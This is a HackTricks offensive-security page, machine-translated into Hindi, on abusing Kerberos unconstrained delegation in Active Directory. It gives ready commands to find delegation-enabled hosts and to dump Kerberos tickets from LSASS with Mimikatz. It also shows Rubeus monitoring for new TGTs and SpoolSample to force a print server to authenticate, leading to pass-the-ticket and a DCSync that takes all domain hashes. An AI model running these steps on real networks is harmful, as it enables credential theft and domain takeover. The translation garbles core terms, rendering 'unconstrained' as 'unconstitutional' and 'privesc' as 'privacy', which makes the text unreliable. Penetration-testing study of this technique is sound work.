hacktricks/windows-hardening/active-directory-methodology/unconstrained-delegation.md
Translator workflow 75e8745ba3 Translated to Hindi
2023-11-06 08:38:02 +00:00

11 KiB

असंविधानिक डिलीगेशन

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

असंविधानिक डिलीगेशन

यह एक सुविधा है जिसे डोमेन प्रशासक किसी भी कंप्यूटर में सेट कर सकता है। फिर, जब भी एक उपयोगकर्ता लॉगिन करता है कंप्यूटर पर, उस उपयोगकर्ता के TGT की एक प्रतिलिपि DC द्वारा प्रदान किए गए TGS में भेजी जाएगी और LSASS में मेमोरी में सहेजी जाएगी। इसलिए, यदि आपके पास मशीन पर प्रशासक विशेषाधिकार हैं, तो आप किसी भी मशीन पर टिकट्स को डंप कर सकेंगे और उपयोगकर्ताओं का अनुकरण कर सकेंगे

तो यदि डोमेन व्यवस्थापक "असंविधानिक डिलीगेशन" सुविधा सक्रिय करके किसी कंप्यूटर में लॉगिन करता है, और आपके पास उस मशीन में स्थानीय प्रशासक विशेषाधिकार हैं, तो आप कहीं भी टिकट को डंप कर सकेंगे और डोमेन व्यवस्थापक का अनुकरण कर सकेंगे (डोमेन प्राइवेसी).

आप इस गुण के साथ कंप्यूटर ऑब्जेक्ट्स ढूंढ सकते हैं जांचकर कि क्या userAccountControl गुण ADS_UF_TRUSTED_FOR_DELEGATION को समावेश करता है। आप इसे एक LDAP फ़िल्टर के साथ कर सकते हैं ' (userAccountControl:1.2.840.113556.1.4.803:=524288) ', जो powerview करता है:

# असंविधानिक कंप्यूटरों की सूची
## Powerview
Get-NetComputer -Unconstrained #DCs हमेशा दिखाई देते हैं लेकिन privesc के लिए उपयोगी नहीं होते हैं
## ADSearch
ADSearch.exe --search "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" --attributes samaccountname,dnshostname,operatingsystem
# Mimikatz के साथ टिकट निर्यात करें
privilege::debug
sekurlsa::tickets /export #सिफारिश की जाती है
kerberos::list /export #एक और तरीका

# लॉगिन की निगरानी करें और नए टिकट निर्यात करें
.\Rubeus.exe monitor /targetuser:<username> /interval:10 #नए TGT के लिए हर 10 सेकंड में जांचें

Mimikatz या Rubeus के साथ व्यवस्थापक (या पीड़ित उपयोगकर्ता) का टिकट मेमोरी में लोड करें एक पास द टिकट** के लिए**।
अधिक जानकारी: https://www.harmj0y.net/blog/activedirectory/s4u2pwnage/
ired.team में असंविधानिक डिलीगेशन के बारे में अधिक जानकारी।

प्रमाणीकरण को बलवान बनाएं

यदि एक हमलावर किसी कंप्यूटर को "असंविधानिक डिलीगेशन" के लिए अनुमति देने के लिए सक्षम है, तो वह एक प्रिंट सर्वर को स्वचालित रूप से लॉगिन करने के लिए धोखा दे सकता है और सर्वर की मेमोरी में एक TGT को सहेज सकता है।
फिर, हमलावर उपयोगकर्ता प्रिंट सर्वर कंप्यूटर खाते का अनुकरण करने के लिए एक पास द टिकट हमला कर सकता है।

किसी भी मशीन के खिलाफ प्रिंट सर्वर को लॉगिन करने के लिए आप [**SpoolSample

.\SpoolSample.exe <printmachine> <unconstrinedmachine>

यदि TGT एक डोमेन कंट्रोलर से है, तो आप एक DCSync हमला कर सकते हैं और DC से सभी हैश प्राप्त कर सकते हैं।
इस हमले के बारे में अधिक जानकारी ired.team में।

यहां अन्य तरीके हैं जिनका उपयोग करके प्रमाणीकरण को बलवान बनाने की कोशिश की जा सकती है:

{% content-ref url="printers-spooler-service-abuse.md" %} printers-spooler-service-abuse.md {% endcontent-ref %}

रोकथाम

  • विशेष सेवाओं के लिए सीमित डीए/व्यवस्थापक लॉगिन करें
  • उच्चाधिकारी खातों के लिए "खाता संवेदनशील है और इसे अधिग्रहण नहीं किया जा सकता" सेट करें।
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥